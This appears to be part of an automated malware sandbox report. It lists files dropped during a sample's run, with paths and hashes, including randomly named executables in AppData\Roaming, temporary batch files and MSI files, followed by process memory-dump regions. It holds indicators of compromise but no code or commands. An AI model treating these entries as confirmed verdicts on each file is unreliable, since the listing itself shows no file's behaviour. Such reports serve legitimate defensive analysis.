C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.js
Filesize
15KB

MD5
9841536310d4e186a474dfa2acf558cd

SHA1
33fabbcc5e1adbe0528243eafd36e5d876aaecaa

SHA256
5b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9

SHA512
b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url
Filesize
168B

MD5
1c1f6159630c170b596af7c9085f8bb0

SHA1
ac26cfe43e10a9f76aee943f9ceff3dc77df29fd

SHA256
61403502b3d584ab749a417955dda3d6c956e64109cc4ac4e46e44b462b7c4f0

SHA512
f93d2e86c287ed4e50a0c00bcd9594c322cfbd0507bbd191d97c7dd2881850296986139df9580ba1bbaae8abab284335db64c41f6edde441e34fa56b934c3046

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
48KB

MD5
5931f22c21b865b7bb9a36ea895ad713

SHA1
145f5c216882335b5d0a45a703b7bad60f8f848a

SHA256
d1cd47cc99bbdb9f69617151ae2a148f1610164880191d79a45b425a2db269f2

SHA512
3d61417f65eac2b20cf37a0a390f5136257213da2e93485311a084f44b2ccf2bb6e3d5f7a85a27c132f7883ebe13321a688916e1799e001a2383c8ab048279a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a5c074e56305e761d7cbc42993300e1c

SHA1
39b2e23ba5c56b4f332b3607df056d8df23555bf

SHA256
e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

SHA512
c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\E1D4.tmp\E1D5.tmp\E1D6.bat
Filesize
6KB

MD5
45f6bf2d3c1c47e445439b805929aae8

SHA1
9d2ba518dd058559bc1d690019bbed79c7cd5f85

SHA256
ca7484221dd9645e4608a8195965d941955cfb0f9a373d0870cfd244302ae0fa

SHA512
902eb3e38b0be7d795f17a779d0231d0d168fbb8d4ce32b48ba3774a6be9929016b213e9b0082b55e8ac4d2fadadce3184ba8c30f8a025003fec8c8b8e496c64

Download Submit
C:\Users\Admin\AppData\Local\Temp\E2DE.tmp\E2DF.tmp\E2E0.bat
Filesize
1KB

MD5
2b49f09f8e1785bf2e5c79d0f2bc7389

SHA1
05d68482ab1db17e11fef25fae270c3b784000ae

SHA256
706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279

SHA512
ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0lyah1gm.hdo.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\efckgwgt.pjh0.exe
Filesize
94KB

MD5
40208a80f2b2155185d8a5bac4b9c367

SHA1
d7bf694f6046be8d6a882c86df12c1a35e26ab60

SHA256
cf879d5a689376a47310ceb1b95167ccd18ab2073a1356b8d9cecbf04141ae16

SHA512
5ff32150c9e62261732c36b4bf2c4f84c58b120b72652b2c22a7591865dd6babbfb741fb75177acd845b072a4ea2a594960a894a2bca4f220c2f897ccd692621

Download Submit
C:\Users\Admin\AppData\Roaming\efckgwgt.pjh1.exe
Filesize
423KB

MD5
448e72d5b4a0ab039607cbaf93707732

SHA1
bbb85f7a6b8915d6a6739aa4f80be2766c62eb9f

SHA256
df97eb504ed5a3298737f83d418d70025f3be0daf56d6ccae35ec0d2ef813b20

SHA512
a4f82bb6385e1259e082128604e4232e2f0f3436d8fa8aa04ce3b0d42c943b8b3da4ffb74e307ba7243801b5b48ca07848cc8d029fc8a36cfb90e50ebaaba6a4

Download Submit
C:\Users\Admin\AppData\Roaming\efckgwgt.pjh2.exe
Filesize
5.2MB

MD5
f55fc8c32bee8f7b2253298f0a0012ba

SHA1
574c7a8f3eb378c03f58bc96252769296b20970e

SHA256
cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9

SHA512
c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a

Download Submit
C:\Users\Admin\AppData\Roaming\efckgwgt.pjh3.exe
Filesize
89KB

MD5
a3b2fcf0c05bb385115894d38c2e6c44

SHA1
32cf50911381bbec1dad6aec06c2a741bd5d8213

SHA256
dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1

SHA512
fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2

Download Submit
C:\Windows\Installer\MSI749E.tmp
Filesize
125KB

MD5
a6c7f0c329b28edb3e7f10d115d85c6d

SHA1
f36faaf4af452ab0bcd30ef66de7291bcee21264

SHA256
8f2e81c6f8ccd01dd1727cf93b82fe35b3abb8cf1ef3045dcd6cdf3346a59d03

SHA512
d7fb6997c9ff0dae74634422b8953a276604c0aa27b1e8d9ce4c87220fd469c6eecac6d86da857ff75378c535d2a684b4a120927c62f5267f1bd4dbdc05a72cf

Download Submit
C:\Windows\Installer\MSI74EF.tmp
Filesize
390KB

MD5
80bebea11fbe87108b08762a1bbff2cd

SHA1
a7ec111a792fd9a870841be430d130a545613782

SHA256
facf518f88cd67afd959c99c3ba233f78a4fbfe7fd3565489da74a585b55e9d1

SHA512
a760debb2084d801b6381a0e1dcef66080df03a768cc577b20b8472be87ad8477d59c331159555de10182d87340aa68fe1f3f5d0212048fd7692d85f4da656f6

Download Submit
C:\Windows\Installer\MSIDC96.tmp
Filesize
341KB

MD5
74528af81c94087506cebcf38eeab4bc

SHA1
20c0ddfa620f9778e9053bd721d8f51c330b5202

SHA256
2650b77afbbc1faacc91e20a08a89fc2756b9db702a8689d3cc92aa163919b34

SHA512
9ce76594f64ea5969fff3becf3ca239b41fc6295bb3abf8e95f04f4209bb5ccddd09c76f69e1d3986a9fe16b4f0628e4a5c51e2d2edf3c60205758c40da04dae

Download Submit
C:\Windows\Installer\e58725c.msi
Filesize
25.3MB

MD5
0df081aa47e7159e585488a161a97466

SHA1
2dc9a592dbb208624aff11a57f97bea89a315973

SHA256
20c578361911d7b0cf153b293b025970eca383a2c802e0df438ac254aaca165d

SHA512
2e1b58add6a714281f2ddeb936069c0eb8ce24ae2e440941379c4273afd7f1a96b162d5b88211e8678804bad652e48c99a4993e0e0d0da4d1abd7550d397e836

Download Submit
memory/316-120-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/316-119-0x00000138698F0000-0x000001386991B000-memory.dmp

Filesize
172KB

Download
memory/612-109-0x000001978F4F0000-0x000001978F514000-memory.dmp

Filesize
144KB

Download
memory/612-110-0x000001978F520000-0x000001978F54B000-memory.dmp

Filesize
172KB

Download
memory/612-111-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/628-103-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/628-104-0x00007FFEF50D0000-0x00007FFEF52C5000-memory.dmp

Filesize
2.0MB

Download
memory/628-105-0x00007FFEF4E00000-0x00007FFEF4EBE000-memory.dmp

Filesize
760KB

Download
memory/628-98-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/628-99-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/628-101-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/628-106-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/628-100-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/672-114-0x00000113BEF30000-0x00000113BEF5B000-memory.dmp

Filesize
172KB

Download
memory/672-115-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/728-123-0x0000013BC4690000-0x0000013BC46BB000-memory.dmp

Filesize
172KB

Download
memory/728-124-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/956-127-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/956-126-0x0000028C7C7A0000-0x0000028C7C7CB000-memory.dmp

Filesize
172KB

Download
memory/1056-134-0x0000022238BB0000-0x0000022238BDB000-memory.dmp

Filesize
172KB

Download
memory/1056-135-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/1128-137-0x000001E7BBCC0000-0x000001E7BBCEB000-memory.dmp

Filesize
172KB

Download
memory/1128-138-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/1136-140-0x000001D715540000-0x000001D71556B000-memory.dmp

Filesize
172KB

Download
memory/1136-141-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/1144-144-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/1144-143-0x0000023231C90000-0x0000023231CBB000-memory.dmp

Filesize
172KB

Download
memory/1192-147-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/1192-146-0x0000017FE3560000-0x0000017FE358B000-memory.dmp

Filesize
172KB

Download
memory/1268-151-0x00000295521D0000-0x00000295521FB000-memory.dmp

Filesize
172KB

Download
memory/1268-152-0x00007FFEB5150000-0x00007FFEB5160000-memory.dmp

Filesize
64KB

Download
memory/1672-61-0x00007FFED6550000-0x00007FFED7011000-memory.dmp

Filesize
10.8MB

Download
memory/1672-3-0x0000023434F60000-0x0000023434F82000-memory.dmp

Filesize
136KB

Download
memory/1672-13-0x00007FFED6550000-0x00007FFED7011000-memory.dmp

Filesize
10.8MB

Download
memory/1672-14-0x00007FFED6550000-0x00007FFED7011000-memory.dmp

Filesize
10.8MB

Download
memory/1672-15-0x00007FFED6550000-0x00007FFED7011000-memory.dmp

Filesize
10.8MB

Download
memory/1672-16-0x00007FFED6550000-0x00007FFED7011000-memory.dmp

Filesize
10.8MB

Download
memory/1672-17-0x00007FFED6550000-0x00007FFED7011000-memory.dmp

Filesize
10.8MB

Download
memory/3692-3269-0x0000028CB39B0000-0x0000028CB4156000-memory.dmp

Filesize
7.6MB

Download
memory/4200-85-0x00007FFEF50D0000-0x00007FFEF52C5000-memory.dmp

Filesize
2.0MB

Download
memory/4200-81-0x0000000000770000-0x0000000000779000-memory.dmp

Filesize
36KB

Download
memory/4200-84-0x0000000002770000-0x0000000002B70000-memory.dmp

Filesize
4.0MB

Download
memory/4200-87-0x00000000772A0000-0x00000000774B5000-memory.dmp

Filesize
2.1MB

Download
memory/4444-76-0x00000000033D0000-0x00000000037D0000-memory.dmp

Filesize
4.0MB

Download
memory/4444-77-0x00000000033D0000-0x00000000037D0000-memory.dmp

Filesize
4.0MB

Download
memory/4444-42-0x00000000001A0000-0x000000000021E000-memory.dmp

Filesize
504KB

Download
memory/4444-78-0x00007FFEF50D0000-0x00007FFEF52C5000-memory.dmp

Filesize
2.0MB

Download
memory/4444-80-0x00000000772A0000-0x00000000774B5000-memory.dmp

Filesize
2.1MB

Download
memory/4444-82-0x00000000001A0000-0x000000000021E000-memory.dmp

Filesize
504KB

Download
memory/4472-1-0x0000000000280000-0x0000000000288000-memory.dmp

Filesize
32KB

Download
memory/4472-0-0x00007FFED68D3000-0x00007FFED68D5000-memory.dmp

Filesize
8KB

Download